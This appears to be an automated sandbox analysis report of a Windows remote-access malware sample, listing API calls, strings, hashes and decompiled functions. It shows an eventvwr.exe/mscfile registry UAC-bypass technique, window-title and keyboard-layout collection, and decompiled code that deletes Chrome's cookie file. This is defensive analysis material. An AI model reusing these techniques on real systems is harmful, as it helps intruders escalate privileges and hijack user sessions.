                                  • Sleep.KERNEL32(00000BB8), ref: 00409DFA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                  • exit.MSVCRT ref: 00409E77
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                  • String ID: 2.7.2 Pro$override$pth_unenc
                                  • API String ID: 3602623569-3893205188
                                  • Opcode ID: a6861308764c8e0be41d382907f78932ef534f6a26338d4c1402dcf431f7bea7
                                  • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                  • Opcode Fuzzy Hash: a6861308764c8e0be41d382907f78932ef534f6a26338d4c1402dcf431f7bea7
                                  • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030EC, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?), ref: 0040318F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                  • exit.MSVCRT ref: 004031D8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                  • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                  • API String ID: 2587331422-3923289169
                                  • Opcode ID: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                  • Opcode Fuzzy Hash: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D9A0, Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardLayoutNameA.USER32(00000000), ref: 0040D9AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                    • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                  • String ID:
                                  • API String ID: 3751107300-0
                                  • Opcode ID: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                  • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                  • Opcode Fuzzy Hash: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                  • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EA96, Relevance: 27.1, APIs: 18, Instructions: 95windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowTextW.USER32 ref: 0040EAAF
                                  • IsWindowVisible.USER32(?), ref: 0040EAB8
                                  • sprintf.MSVCRT ref: 0040EACF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                  • String ID:
                                  • API String ID: 1480451481-0
                                  • Opcode ID: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                  • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                  • Opcode Fuzzy Hash: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                  • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D64E, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                  • String ID: open
                                  • API String ID: 2112629403-2758837156
                                  • Opcode ID: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                  • Opcode Fuzzy Hash: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004071CF, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E004071CF() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome Cookies found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome Cookies not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                  0x004071e4
                                  0x004071ef
                                  0x004071f6
                                  0x004071fa
                                  0x00407205
                                  0x0040720e
                                  0x0040721d
                                  0x00407271
                                  0x00407277
                                  0x0040727f
                                  0x00407281
                                  0x00407284
                                  0x00000000
                                  0x0040728a
                                  0x00407226
                                  0x00407227
                                  0x0040725c
                                  0x00407238
                                  0x0040723e
                                  0x00407244
                                  0x0040724f
                                  0x00000000
                                  0x00407255
                                  0x0040722a
                                  0x00407233
                                  0x00000000
                                  0x00407236
                                  0x0040722c
                                  0x00000000

                                  APIs
                                  • getenv.MSVCRT ref: 004071E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                  • GetLastError.KERNEL32 ref: 0040721F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                  Strings
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                  • UserProfile, xrefs: 004071DF
                                  • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                  • [Chrome Cookies not found], xrefs: 00407239
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 3740952235-304995407
                                  • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                  • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041203B, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 61timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E0041203B(char _a4, char _a20) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				int _t18;
				char* _t26;
				char* _t27;
				char* _t28;
				char* _t29;

				if( *0x41bcac != 0) {
					GetLocalTime( &_v20);
					_t3 =  &(_v20.wSecond); // 0x4051ef
					_t26 =  &_v84;
					L00414176();
					_t27 =  &_v68;
					L00414170();
					_t28 =  &_v52;
					L00414140();
					_t29 =  &_v36;
					L00414170();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
					_t18 = printf(_t29);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t18;
			}













                                  0x00412048
                                  0x00412052
                                  0x0041205d
                                  0x0041207e
                                  0x00412087
                                  0x00412090
                                  0x00412094
                                  0x0041209d
                                  0x004120a1
                                  0x004120aa
                                  0x004120ae
                                  0x004120b8
                                  0x004120bf
                                  0x004120cb
                                  0x004120d4
                                  0x004120dd
                                  0x004120e6
                                  0x004120e6
                                  0x004120ef
                                  0x004120f8
                                  0x004120ff

                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00412052
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                  • printf.MSVCRT ref: 004120BF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
